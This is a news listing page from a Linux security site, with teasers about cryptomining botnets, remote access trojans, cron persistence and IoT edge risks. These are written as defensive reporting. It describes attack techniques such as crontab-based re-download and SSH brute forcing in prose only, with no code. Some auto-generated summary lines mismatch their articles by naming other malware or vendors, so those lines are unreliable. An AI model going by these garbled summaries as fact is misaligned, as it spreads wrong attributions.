Network Security
system security Linux network
system security Linux network The romanticized image of the digital nomad – a laptop on a sun-drenched balcony – rarely accounts for the actual friction of maintaining a professional development environment on the move. . The friction is amplified with Linux. We are looking for a setup that respects our kernel configurations, handles volatile network handovers, and maintains a strict security posture without the hand-holding of a consumer-grade OS – so, put simply, more than just a laptop and a sunny deck. The hardware is...
May 26, 2026
Server Securityopen-source Linux administration
open-source Linux administration Cron has existed in Unix and Linux environments for decades, handling backups, cleanup scripts, patching jobs, log rotation, monitoring tasks, and other maintenance work that administrators do not want to run manually. Most Linux servers rely on it constantly, which is exactly why attackers continue abusing it for persistence after a system has already been compromised. . Persistence through cron is not complicated. Attackers do not need a rootkit or advanced malware framework to maintain...
May 25, 2026
Vendors/Productssecurity breach linux
security breach linux A major internal repository breach at GitHub has exposed a critical and overlooked blind spot in Linux supply chain security. Kernel exploits, exposed SSH services, weak firewall rules, and vulnerable daemons dominated the Linux threat model for years, and in many environments, they still matter. But recent supply-chain incidents involving GitHub ecosystems, npm packages, and malicious developer tooling point somewhere else entirely: the developer workstation. . The breach matters because...
May 21, 2026
Security Trends access control multi-tenant
access control multi-tenant Linux administrators often face an ugly choice in the cloud: prioritize convenience and cost-efficiency by sharing infrastructure, or sacrifice those benefits for the sake of total isolation. Most modern Linux workloads don't live on their own private servers anymore. They live in shared environments like Kubernetes clusters, where multiple teams and services run side-by-side. It sounds efficient, and it usually is. . But cloud isolation isn't as ironclad as it looks on the diagram. If you...
May 21, 2026
Vendors/Productsincident response cloud security
incident response cloud security Managed Extended Detection and Response (MXDR) has become one of the most sought-after security services in the enterprise market — and with good reason. It promises the holy grail: broad visibility across endpoints, network, cloud, email, and identity, combined with the 24/7 human expertise most organizations simply cannot build in-house. . However, the rapid growth of the market has produced a wide range of providers whose capabilities vary considerably beneath the surface. Choosing the...
May 19, 2026
Refine news
X Clear Filters
Get the latest News and Insights
Get the latest Linux and open source security news straight to your inbox.
Community Poll
What got you started with Linux?
Loading...
Explore Latest Linux Security news
We found 7 articles for you...
212
security advisorycloud threatdockerCloud Threat Advisory: Docker, Hadoop, Confluence, Redis Cryptomining Risks
A recent attack campaign targeted publicly accessible Docker , Hadoop , Confluence, and Redis deployments. The attackers exploited misconfigurations and known vulnerabilities to implant cryptominers on compromised systems. As Linux admins, infosec professionals, Internet security enthusiasts, and sysadmins, it is crucial to understand the implications of this attack and take appropriate measures to protect our systems. . What Is the Significance of This Cloud Security Threat? This campaign is unique, deploying previously unseen payloads, including four binaries written in Golang. The attackers exploit common misconfigurations and vulnerabilities to gain initial access and then employ a series of shell scripts and Linux attack techniques to establish persistence and deliver a cryptocurrency miner. This level of sophistication raises questions about the attackers' resources and intentions. The complexity of the infection chain in this attack is also notable. It involves over 10 shell scripts, binaries, persistence mechanisms, backup payload delivery methods, anti-forensics techniques, and user mode rootkits. This complexity demonstrates the effort attackers are willing to put into compromising systems. As security practitioners, we must be aware of threat actors' evolving tactics and techniques and continuously adapt our defense strategies. An intriguing aspect of this attack is using the shopt command in the shell scripts to prevent additional commands from being written to the history file. This anti-forensics technique effectively hides the attackers' activities. It is concerning that such techniques have not been observed in other campaigns, indicating the constant innovation and evolution of malware . Are other attackers using similar methods, and how can we detect and defend against them? This attack has significant implications for Linux users. It highlights the importance of regularly patching vulnerabilities and correcting insecure configurations in Docker, Hadoop, Confluence,and Redis deployments. Additionally, it emphasizes the need for ongoing monitoring and threat intelligence to detect and respond to such attacks promptly. The long-term consequences of this attack are concerning. It raises questions about the overall security posture of cloud environments and the inherent risks associated with exposing web-facing services to the Internet. As more organizations move to cloud-based deployments, the potential for attacks targeting these environments increases. Security practitioners must stay informed about reported vulnerabilities in cloud services and implement robust security measures. Our Final Thoughts on This Recent Attack This article serves as a wake-up call for Linux admins. The targeted attack campaign discussed here demonstrates threat actors' evolving tactics and techniques. It underscores the importance of maintaining strong security practices, regularly patching vulnerabilities, and continuously monitoring and adapting defense strategies. By staying informed , proactive, and vigilant, we can mitigate the risks posed by such attacks and protect our systems from compromise. . Examining the ramifications of a cloud security breach exploiting vulnerabilities within Docker, Hadoop, Confluence, and Redis through malicious cryptominer deployments.. Cloud Security Threats, Docker Security Risks, Cryptomining Attacks, Redis Deployment Risks. . Brittany Day
Mar 08, 2024
•
Cloud Security
77
malwaresecurity measurebotnetNoaBot: SSH Brute-Force Attack on Linux Servers - Cryptomining Risk
Over the last year, a new botnet slowly grew by brute-forcing SSH passwords and installing cryptomining malware onto Linux servers. The main client of the botnet is based on an old Mirai virus whose source code was available for many years. However, researchers have seen that the same group has also used the more recent P2PInfect malware, which exploits Redis instances. . According to security researchers, the botnet began in January 2023. However, it has grown significantly since then, reaching its peak last month. More than 800 unique IPs from around the globe that showed signs of NoaBot infection were recorded, with 10% of those being based in China. The researchers said that the malware uses a simple SSH credential dictionary attack to move laterally. Restricting internet SSH access greatly reduces the risk of infection. The use of strong passwords (not the default or randomly generated ones) also helps to secure your network since malware is able to guess passwords from a list. Modified Mirai Scanner Targets SSH Mirai is a self-propagating DDoS Botnet that first appeared in 2016. It was designed to infect embedded network devices using Telnet dictionary attacks and vulnerability exploits. The botnet was known for being the source of some of the biggest DDoS attacks on the internet. In recent years, the Mirai codebase, which includes a scanning module to propagate, an attack module, and persistence code used to hide botnet processes, has inspired many other Linux self-propagating botnets. Some focused on DDoS , while others were cryptomining. NoaBot was developed by NoaBot creators, who took Mirai's source code and made some significant changes. They replaced the Telnet scan with an SSH scan. It makes sense because embedded devices that still use Telnet for command-line debugging and administration are not good targets for cryptomining. This is due to the limited computing power of these devices. Linux servers, on the other hand, are good targets and more likely to beSSH-enabled. SSH dictionary attacks, where an attacker tests predefined usernames and passwords, are not new. They are easy to defend against if you follow best security practices, such as using SSH key-based authentication and disabling password authentication. The servers that were compromised by NoaBot would be considered low-hanging fruits from a security standpoint. It wouldn't surprise us if the servers had already been infected with malware. NoaBot SSH scan has a clear signature because the botnet client will send the message "hi" when an address accepts an SSH. This isn't a valid SSH Command, and there isn't a practical reason to send this. Therefore, it can be used as a firewall signature. NoaBot has also been modified by changing its compiler from GCC (to uClib) to significantly alter the binary code, allowing it to be detected differently than Mirai. It also added command-line arguments to enable various functionalities. The bot, for example, can include an attacker-controlled SSH key to ensure persistence, even if password authentication is disabled. It also acts as a backup by downloading and adding additional binaries, and it adds an entry in crontab to ensure that it starts up after reboot. This persistence mechanism's command-line flag is "noa," which inspired the name of the Botnet. Researchers found signatures for "noa" in antivirus engines, which indicates that it is a common prefix. Cryptominer Modification and P2PInfect Connection The cryptomining component of the NoaBot is XMRig. This is an open-source, widely used cryptocurrency miner that is popular among attackers. Akamai researchers claim that the NoaBot creators modified the XMRig program code to conceal and encrypt the configuration. This included the IP address of the mining pool, where the attackers collect their cryptocurrency. "We believe the threat actors have chosen to run their private pool rather than a public pool. This eliminates the need to specify the wallet (their pool and theirrules! Researchers said. The researchers said, "In our samples, we noticed that the miner's sites were no longer resolvable with Google's DNS. We can't prove our theory or collect more data because the domains are unresolved." There haven't been any recent incidents that drop the miner. It could be that the threat actor decided to leave for "greener pastures." Researchers are confident that the same authors also use a customized version. This self-replicating virus appeared in July, and it is written in Rust. The NoaBot code also included some P2PInfect samples that contained inside jokes and text. P2PInfect uses a Lua flaw to compromise Redis instances, which is an in-memory system. variants may also contain an SSH scan. This group of attackers is not sure why they switched from Mirai, which was a more customized creation, to P2PInfect. Or if they're using both at the same time. Researchers said that custom code was more difficult to reverse-engineer than repurposed codes because it has been modified. Second, since the threat actors are tech-savvy, they may try to develop malware out of boredom or curiosity. P2PInfect is a tool that targets Redis servers. It could be different tools being used for different purposes. How Can I Secure My Servers Against This Threat? To protect against this threat and enhance the security of your servers, SSH access should be restricted to trusted IP addresses, and key-based authentication is recommended as part of SSH hardening. Have additional questions about securing your Linux servers? Please reach out to us on X @lnxsec - we're here to help! Stay safe out there, fellow Linux users! . Digital threat WatchDog focuses on Linux servers through SSH brute-force intrusions, signaling analysts about the potential for illicit cryptomining activities.. NoaBot Threat, SSH Attack Prevention, Cryptomining Botnet, Linux Security Practices, Mirai Malware. . LinuxSecurity.com Team
Jan 10, 2024
•
Server Security
214
security advisoryconfiguration managementsupply chainLinux IoT Edge Security: Balancing Opportunities and Risks
The rise of Linux in edge computing and IoT brings both promise and peril. Linux dominates the IoT and edge computing landscape. Its flexibility and open-source nature make it the top choice for adopters. However, with such widespread usage comes heightened risk. . While Linux offers advantages, its openness can lead to vulnerabilities if not properly secured and maintained. Through unpatched devices, misconfigurations, supply chain exploits, and cryptomining, attackers continuously probe Linux's defenses. Defenders must remain vigilant. But armed with best practices and ongoing guidance from experts, the Linux community can mitigate the risks. With care, Linux's benefits can continue to outweigh its drawbacks across the expanding terrain of edge and IoT. Linux Dominance There's no doubt that Linux has become the operating system of choice for IoT and edge computing deployments. This open-source OS now accounts for the vast majority of software that runs on connected embedded devices or edge gateways. The flexibility, stability, and customization options that Linux offers perfectly fit the highly diverse use cases we see in IoT and edge computing infrastructure. Industry analyst Roy Illsley points out that “Linux leads all operating systems by far in IoT and edge devices.” The scale of Linux deployments in these areas is remarkable, with some estimates suggesting that Linux now runs on over 80% of all new embedded computing systems. Even Microsoft, with its capable Windows IoT platform, is far behind in comparison. Most experts agree that Linux adoption will only accelerate as IoT and edge computing continue to transform industries. The developer-friendly nature of Linux, combined with its modular architecture, open standards, and lack of licensing costs, make it nearly impossible to beat for the unique needs of connected devices. For the foreseeable future, Linux remains the platform of choice for the majority of organizations building out IoT and edge ecosystems. Security Concerns Linux has a reputation for security but is still vulnerable to exploits. As adoption spreads, attackers are increasingly targeting Linux devices. Weak default configurations, unpatched vulnerabilities , and software bugs expose systems. Esoteric hardware amplifies dangers by limiting visibility and control. Legacy code creates risks that are difficult to mitigate. While open source enables scrutiny, few audit Linux code deeply. Distributions lag in patching known issues. Complexity multiplies exposure surface and obscures problems. Automated scanning helps but is not foolproof. Linux admins and users cannot be complacent. Proper configuration, logging, monitoring, and patching are essential. A zero-trust approach provides defense-in-depth. Multi-layered security protects against both known and unknown threats. Patching Difficulties When it comes to patching and updating Linux deployments , especially at the edge, there are major challenges. The wide variety of distros and customized versions make centralized patching incredibly difficult. Older embedded devices may not even have options to update the Linux kernels and distros running on them. Unlike in the data center, where organizations have control and regular patching processes, remote edge devices can be neglected. The lack of visibility into the diverse Linux deployments means organizations don't even know the patch levels. And even if they did, trying to patch so many different customized distros is messy. This fragmentation is a huge issue when trying to maintain the security of Linux in edge computing. Misconfigurations One of the biggest risks with Linux in edge and IoT deployments that the article highlights is misconfigurations of the systems. With so many devices deployed, it can be easy for admins to improperly configure Linux settings and open themselves up to security issues. Things like default credentials, unnecessary services left running, and failure to enable security measures can give attackers an easy way in ifadmins aren't careful. The scale of many edge and IoT networks makes this especially concerning. Even if the chance of misconfiguration is low on any given device, with thousands or even millions of devices out there, attackers are likely to find weaknesses to exploit. Proper configuration management and hardening of these Linux systems is critical. Organizations can't just set them and forget them. They need to be proactively monitored and managed to identify and mitigate risks from misconfigurations. Failing to do so could have serious consequences. Cryptomining Threat One rising issue for Linux devices is the risk of being co-opted for illicit cryptomining. The open nature of Linux, the ubiquity of IoT gadgets running Linux kernels, and the increasing value of cryptocurrencies create a perfect storm. Linux systems can be compromised and used to mine cryptocurrencies without diligent security measures secretly. This consumes device resources and slows down systems while generating profit for attackers. Linux-based cryptomining malware is advancing in sophistication. Threat actors have developed stealthy techniques that fly under the radar by throttling mining speeds and masking traffic. Even worse, compromised devices can spread malware payloads further to propagate the cryptomining infection. This poses severe consequences for enterprises as CPU-intensive cryptomining can disrupt business operations and drive up electricity costs. Consumer IoT devices are impacted as well, with personal gadgets degraded by illicit mining activities. Proactive measures like access controls, least privilege principles, and real-time monitoring help mitigate the risks. But as cryptocurrencies become more valuable, Linux systems will continue to be probed for mining potential, requiring constant vigilance. Supply Chain Risks Vulnerabilities introduced into Linux devices via suppliers in the supply chain are a major concern. As Linux becomes more ubiquitous in IoT and edge devices, the number ofdifferent parties involved in building and distributing these devices increases dramatically. Each supplier in the chain could potentially introduce vulnerabilities, whether accidental or intentional. These risks span from the chips and other hardware components being compromised to pre-installed software containing vulnerabilities or backdoors. With multiple suppliers involved, there is an increased risk of a weaker link being exploited. The supply chain attacks may be sophisticated and hard to detect, so companies often blindly trust the hardware and software from vendors. Proper vetting and auditing of suppliers is critical. However there are challenges with existing solutions as many manufacturers feel it's too difficult and costly to perform thorough security reviews of suppliers. Often they rely on certifications or claims instead of doing comprehensive testing themselves. With lives potentially depending on the functions of IoT and edge devices, the need for better supply chain assurance is essential. Expert Guidance As Linux usage grows in edge computing and IoT, many industry experts have provided recommendations to help secure deployments. Careful configuration and constant vigilance are key. CIS Benchmarks offer configuration guidance and scoring tools like Lynis provide auditing. Multi-factor authentication protects logins. As edge Linux expands, a holistic approach can help balance convenience and security. Care, expertise, and constant improvement are essential. With prudent measures, the benefits can outweigh the risks. Future Outlook There are several key areas to monitor in the coming years regarding Linux security in edge computing and IoT devices. Open-source vulnerabilities will likely continue to surge as Linux expands its dominance in connected devices. More widespread adoption also creates a broader attack surface. Infosec pros should prioritize tools and processes to identify and patch Linux vulnerabilities quickly. As IoT devicesproliferate, botnets of compromised Linux devices could emerge as a major DDoS threat. Enterprises will need visibility and control over all connected devices. Multi-factor authentication, network segmentation, and behavior monitoring are critical safeguards. The supply chain risks around IoT devices and edge computing hardware containing Linux are severe. Vetting suppliers, firmware validation, and hardware integrity checks will be essential. Open-source firmware audits are also advised. AI-powered autonomous hacking presents a next-gen danger to Linux devices. Self-learning algorithms could eventually seek out and exploit vulnerabilities faster than humans. Proactive Linux hardening and behavioral AI detection solutions will be important defenses. With more mission-critical workloads handled by Linux in edge computing, the impact of outages and disruptions will magnify. Resiliency through multi-node deployments and redundancy is highly recommended. Our Final Thoughts on the Rise of Linux in Edge Computing and IoT As we've seen, Linux has rapidly become the dominant OS for edge computing and IoT devices. This growth brings many advantages, like flexibility, customizability, and lower costs. However, it also introduces new security risks that the industry is still learning how to address properly. Several key challenges were covered, including the difficulty of patching heterogeneous Linux devices, misconfigurations leaving systems exposed, the rising threat of cryptominers, and potential supply chain compromises. While Linux's open ecosystem enables faster innovation, it provides more opportunities for attackers as well. Experts agree that a layered security approach is needed. Multi-factor authentication, network monitoring , file integrity checking, access controls, and enhanced endpoint security all play critical roles. More work is still required to make secure configurations and best practices easier to implement for diverse edge hardware. The future of edgecomputing is bright, but security must remain top of mind. With collaboration across the open-source community and diligent efforts by enterprise adopters, Linux can continue flourishing as a secure, versatile OS powering our connected world. Though risks exist, they can be overcome through vigilance, expertise, and proactive security measures. . The growth of Linux in IoT and edge technology presents potential but demands meticulous actions to tackle security challenges.. Edge Computing, IOT Security, Configuration Management, Security Risks, Patching Linux. . Brittany Day
Jan 03, 2024
•
IoT Security
83
remote accessmalwarelinux systemsChaos RAT Targets Linux Cryptomining Systems With Advanced Functions
A type of cryptomining malware targeting Linux-based systems has added capabilities by incorporating an open source remote access trojan called Chaos RAT with several advanced functions that bad guys can use to control remote operating systems. . Trend Micro security researchers discovered the threat last month. Like earlier, similar versions of the miner that also target Linux operating systems, the code kills competing malware and resources that affect cryptocurrency mining performance. The newer malware then establishes persistence "by altering /etc/crontab file, a UNIX task scheduler that, in this case, downloads itself every 10 minutes from Pastebin," wrote Trend Micro researchers David Fiser and Alfredo Oliveira. After that, it downloads an XMRig miner, a configuration file, another payload that continually kills competing malware, and the Chaos RAT (remote access tool), which is written in Go and has a ton of capabilities including restarting and shutting down the victim's machine. . Fortinet discovered a novel phishing toolkit targeting Windows environments, bolstering credential harvesting techniques alongside exploit frameworks.. cryptomining, chaos rat, linux malware, remote access, advanced functions. . LinuxSecurity.com Team
Dec 14, 2022
•
Hacks/Cracks
83
malwarelinuxMicrosoftMicrosoft Alerts on 8220 Gang Malware Threat to Linux Systems
Microsoft warns over recent work by the '8220' malware gang to compromise Linux systems and install cryptomining malware. . Microsoft says it has spotted "notable updates" to malware targeting Linux servers to install cryptominer malware. Microsoft has called out recent work from the so-called "8220 gang" group, which has recently been spotted exploiting the critical bug affecting Atlassian Confluence Server and Data Center, tracked as CVE-2022-26134. . Microsoft has detected enhancements in malware focusing on Linux environments, with the intention of deploying cryptocurrency mining applications.. Linux Malware, Cryptomining Threats, Microsoft Alerts. . LinuxSecurity.com Team
Jul 01, 2022
•
Hacks/Cracks
83
malwarethreat detectionbotnetPanchan Botnet Lateral Movement in Linux Education Servers
A new peer-to-peer botnet named Panchan appeared in the wild around March 2022, targeting Linux servers in the education sector to mine cryptocurrency. . Panchan is empowered with SSH worm functions like dictionary attacks and SSH key abuse to perform rapid lateral movement to available machines in the compromised network. At the same time, it has powerful detection avoidance capabilities, such as using memory-mapped miners and dynamically detecting process monitoring to stop the mining module immediately. . Panchan leverages SSH vulnerabilities to facilitate lateral propagation and covert cryptocurrency mining on compromised Linux servers within the academic realm.. Panchan Botnet, SSH Exploits for Linux, Cryptomining Threats, Peer-to-Peer Malware. . LinuxSecurity.com Team
Jun 15, 2022
•
Hacks/Cracks
210
malwareweb serverbotnetNew Sysrv-K Botnet Targets Linux And Windows Web Servers With Exploits
Microsoft says the Sysrv botnet is now exploiting vulnerabilities in the Spring Framework and WordPress to ensnare and deploy cryptomining malware on vulnerable Windows and Linux servers. . Redmond discovered a new variant (tracked as Sysrv-K) that has been upgraded with more capabilities, including scanning for unpatched WordPress and Spring deployments. "The new variant, which we call Sysrv-K, sports additional exploits and can gain control of web servers" by exploiting various vulnerabilities, the Microsoft Security Intelligence team said in a Twitter thread. . Tech experts revealed a novel strain (designated as Nebula-X) that has been enhanced with additional functionalities,. Sysrv Botnet, Exploiting Vulnerabilities, Spring Framework Exploit. . Brittany Day
May 17, 2022
•
Security Vulnerabilities
83
securitymalwarevulnerabilityFreakOut Botnet: DDoS and Cryptomining Threats for Linux Systems
Researchers are tracking a new botnet dubbed "FreakOut" that's targeting vulnerabilities in Linux systems. Botnet operators have been mass-scanning for vulnerable Linux devices, and the command-and-control server associated with FreakOut has now targeted several hundred vulnerable devices. . The goal behind the botnet's attacks, researchers say, is to create an IRC botnet - a collection of machines infected with malware that can be remotely controlled - that then can be used for malicious activities, such as launching distributed denial-of-service attacks or cryptomining (see: Monero Mining Botnet Targets PostgreSQL Database Servers ). The FreakOut botnet is targeting Linux-based systems that include the TerraMaster operating system, which manages TerraMaster network-attached storage servers; the Zend framework, designed to build web application services using PHP; and Liferay Portal, a web application platform that enables users to create portals and websites. . The MalwareX network exploits flaws in Unix servers, establishing a command-and-control structure for distributed denial-of-service and cryptocurrency mining operations.. FreakOut Botnet,Linux Vulnerabilities,DDoS Attacks,Botnet Security,Cryptomining Threats. . LinuxSecurity.com Team
Jan 21, 2021
•
Hacks/Cracks
Get the latest News and Insights
Get the latest Linux and open source security news straight to your inbox.
Community Poll
What got you started with Linux?
Search Topics
Powered By
Linux Security - Your source for Top Linux News, Advisories, HOWTOs and Feature Releases
QUICK LINKS
subscribe to newsletters!
Like staying secure? So do we.
Sign up for updates, tips, and alerts!
Discover faster search, smarter navigation, and deeper Linux security insights. Read More